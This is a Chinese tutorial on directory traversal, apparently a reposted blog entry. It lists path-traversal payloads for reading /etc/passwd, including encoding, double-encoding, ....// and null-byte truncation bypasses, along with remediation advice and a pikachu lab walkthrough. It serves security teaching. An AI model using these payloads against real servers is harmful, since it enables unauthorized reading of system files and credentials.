标签：编码 遍历 .. ..% filename etc 目录

目录遍历（也称为文件路径遍历）是一种 Web 安全漏洞，允许攻击者读取运行应用程序的服务器上的任意文件。

危害：
1、读取的文件可能包括应用程序代码和数据、后端系统的凭据以及敏感的操作系统文件等。
2、在某些情况下，攻击者可能能够写入服务器上的任意文件，从而允许他们修改应用程序数据或行为，并最终完全控制服务器

 ../                    #返回上级目录
漏洞挖掘：

场景：图片
参数：URL中有这样特征的需要注意

?page=a.php
?home=b.html
?file=content
filename

绕过：

1、过滤../
方法：绝对路径：/etc/passwd  
?filename=/etc/passwd
          
2、针对过滤../
构造../
?filename=....//....//....//etc/passwd  

3、过滤../
方法：编码绕过(服务器能够解析的编码)
     URL编码/URL双编码：%2e%2e%2f、%252e%252e%252f、..%252f ---- ../
                    %2e%2e%5c、%252e%252e%255c、..%255c ---- ..\
     非标准编码：     ..%c0%af、..%ef%bc%8f、..%co%af  ---- ../
                    ..%u2216、..%c1%9c              ---- ..\
     服务器能够解析的编码：如base64
                    
4、目录限定(验证开始路径)
方法：使用特殊符号：~ 等
?filename=/var/www/images/../../../etc/passwd
?filename=~/../etc/passwd

5、验证文件拓展名
方法：截断后缀：%00、%0a、%20等等
?filename=../../../../../../../etc/passwd%00.jpg
?filename=../../../../../../../etc/passwd%0a.jpg
?filename=../../../../../../../etc/passwd%20


修复建议：

1、过滤../
2、验证白名单，如纯字母数字字符
3、目录限定：对最终的文件路径进行判断，确保请求文件完整目录后的头N个字符与文档根目录完全相同


打开pikachu靶场，目录遍历，点击”we're jarheads!“

 打开靶场目录，在soup上一级创建1.txt,并写入内容

 查看jarheads.php

 这里直接把传进来的内容进行了require(),造成问题
通过构造路径，查询出1.txt的内容：../1.txt

 成功显示出1.txt的内容

标签：编码,遍历,..,..%,filename,etc,目录
来源： https://www.cnblogs.com/mu-yi2/p/16685936.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。